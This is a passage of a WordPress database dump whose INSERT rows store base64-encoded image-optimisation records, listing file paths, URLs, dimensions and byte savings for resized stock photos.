INSERT INTO `wp_postmeta` VALUES (28753, 2802, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4NjQ4ODM3MS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODY0ODgzNzEuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0NzUzMiwiaWQiOiIyODAyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDg2NDg4MzcxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4NjQ4ODM3MS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODY0ODgzNzEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjczOSwidGltZSI6MTQ4MzU0NzUzNiwiaWQiOjI4MDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4NjQ4ODM3MS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODY0ODgzNzEtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDg2NDg4MzcxLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyMTUwLCJ0aW1lIjoxNDgzNTQ3NTM5LCJpZCI6MjgwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDg2NDg4MzcxLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4NjQ4ODM3MS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODY0ODgzNzEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE4NjgsInRpbWUiOjE0ODM1NDc1NDMsImlkIjoyODAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODY0ODgzNzEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4NjQ4ODM3MS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4NjQ4ODM3MS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo4OTI0LCJ0aW1lIjoxNDgzNTQ3NTQ3LCJpZCI6MjgwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDg2NDg4MzcxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4NjQ4ODM3MS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODY0ODgzNzEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU0MiwidGltZSI6MTQ4MzU0NzU1MSwiaWQiOjI4MDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4NjQ4ODM3MS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODY0ODgzNzEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDg2NDg4MzcxLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0OTUsInRpbWUiOjE0ODM1NDc1NTQsImlkIjoyODAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODY0ODgzNzEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDg2NDg4MzcxLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4NjQ4ODM3MS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTMzLCJ0aW1lIjoxNDgzNTQ3NTU3LCJpZCI6MjgwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDg2NDg4MzcxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4NjQ4ODM3MS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODY0ODgzNzEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE2NDEsInRpbWUiOjE0ODM1NDc1NjEsImlkIjoyODAyfV0='); 
INSERT INTO `wp_postmeta` VALUES (28754, 2796, 'wpfc_optimisation_reduction', '45428'); 
INSERT INTO `wp_postmeta` VALUES (28755, 2796, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3Nzc5NzY2My5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzc3OTc2NjMuanBnIiwid2lkdGgiOjUwNzgsImhlaWdodCI6MzM4NSwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0NzU2NiwiaWQiOiIyNzk2In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzc3Nzk3NjYzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3Nzc5NzY2My0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzc3OTc2NjMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjE5NDIsInRpbWUiOjE0ODM1NDc1NjksImlkIjoyNzk2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzc3OTc2NjMtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzc3Nzk3NjYzLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3Nzc5NzY2My04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6NzI4MCwidGltZSI6MTQ4MzU0NzU3NCwiaWQiOjI3OTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3Nzc5NzY2My03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzc3OTc2NjMtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzc3Nzk3NjYzLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjo2NTE4LCJ0aW1lIjoxNDgzNTQ3NTc4LCJpZCI6Mjc5Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzc3Nzk3NjYzLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzc3OTc2NjMtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzc3OTc2NjMtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MjE2NDUsInRpbWUiOjE0ODM1NDc1ODcsImlkIjoyNzk2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzc3OTc2NjMtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzc3Nzk3NjYzLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3Nzc5NzY2My0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MTA4OCwidGltZSI6MTQ4MzU0NzU5MCwiaWQiOjI3OTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3Nzc5NzY2My0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzc3OTc2NjMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzc3Nzk3NjYzLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo2OTAsInRpbWUiOjE0ODM1NDc1OTQsImlkIjoyNzk2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzc3OTc2NjMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzc3Nzk3NjYzLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3Nzc5NzY2My0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6ODU1LCJ0aW1lIjoxNDgzNTQ3NTk3LCJpZCI6Mjc5Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzc3Nzk3NjYzLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3Nzc5NzY2My01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzc3OTc2NjMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjU0MTAsInRpbWUiOjE0ODM1NDc2MDIsImlkIjoyNzk2fV0='); 
INSERT INTO `wp_postmeta` VALUES (28756, 2789, 'wpfc_optimisation_reduction', '10493'); 
INSERT INTO `wp_postmeta` VALUES (28757, 2789, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0NDc4MDk1Mi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDQ3ODA5NTIuanBnIiwid2lkdGgiOjQ3OTYsImhlaWdodCI6MzMzNywibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0NzYxMCwiaWQiOiIyNzg5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDQ0NzgwOTUyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0NDc4MDk1Mi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDQ3ODA5NTItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU5NCwidGltZSI6MTQ4MzU0NzYxMywiaWQiOjI3ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0NDc4MDk1Mi04MDB4NTU3LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTU3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDQ3ODA5NTItODAweDU1Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDQ0NzgwOTUyLTgwMHg1NTcuanBnIiwicmVkdWN0aW9uIjoxMTg5LCJ0aW1lIjoxNDgzNTQ3NjE3LCJpZCI6Mjc4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDQ0NzgwOTUyLTc2OHg1MzQuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MzQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0NDc4MDk1Mi03Njh4NTM0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDQ3ODA5NTItNzY4eDUzNC5qcGciLCJyZWR1Y3Rpb24iOjExMDAsInRpbWUiOjE0ODM1NDc2MjEsImlkIjoyNzg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDQ3ODA5NTItMTYwMHgxMTEzLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjExMTMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0NDc4MDk1Mi0xNjAweDExMTMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0NDc4MDk1Mi0xNjAweDExMTMuanBnIiwicmVkdWN0aW9uIjo1MTQzLCJ0aW1lIjoxNDgzNTQ3NjI1LCJpZCI6Mjc4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDQ0NzgwOTUyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0NDc4MDk1Mi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDQ3ODA5NTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU2MSwidGltZSI6MTQ4MzU0NzYyOSwiaWQiOjI3ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0NDc4MDk1Mi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDQ3ODA5NTItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDQ0NzgwOTUyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NDIsInRpbWUiOjE0ODM1NDc2MzIsImlkIjoyNzg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDQ3ODA5NTItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDQ0NzgwOTUyLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0NDc4M